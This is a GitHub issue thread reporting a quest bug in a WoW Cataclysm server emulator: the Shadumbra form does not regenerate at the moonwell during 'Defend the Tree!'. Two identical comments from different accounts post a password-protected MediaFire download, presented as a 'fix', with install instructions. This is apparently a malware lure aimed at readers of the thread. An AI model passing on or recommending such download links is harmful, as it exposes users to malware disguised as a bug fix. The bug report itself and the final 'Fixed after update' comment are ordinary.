### ISSUE TITLE
[Quest] - Defend the Tree! 

### ISSUE THREAD

**Issue by chrisdomaub-dev** [gamefreedomgit/Maelstrom#6118]
[//]: # (REMBEMBER! Add links to things related to the bug using for example:)
[//]: # (https://www.wowhead.com/cata)

**Description:**
Shadumbra doesn't regenerate while on the moonwell. You need to be transformed as Shadumbra in order to proceed with the quest.
The quest is doable but Shadumbra doesnt regenerate and is so soft, that would make you need to get Shadumbra many many times.

**How to reproduce:**
go to ashenvale get the quest Defend the Tree!. Transform into Shadumbra, engage in combat with the orcs outside, then try to regen at the moon well.

**How it should work:**
When in the well, Shadumbra should regenerate fast.

**Database links:**
![Screenshot_7](https://github.com/user-attachments/assets/9ab2345c-c045-4370-8cc2-b52147153151)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by PanJanuszek** [comment]
Fixed after update
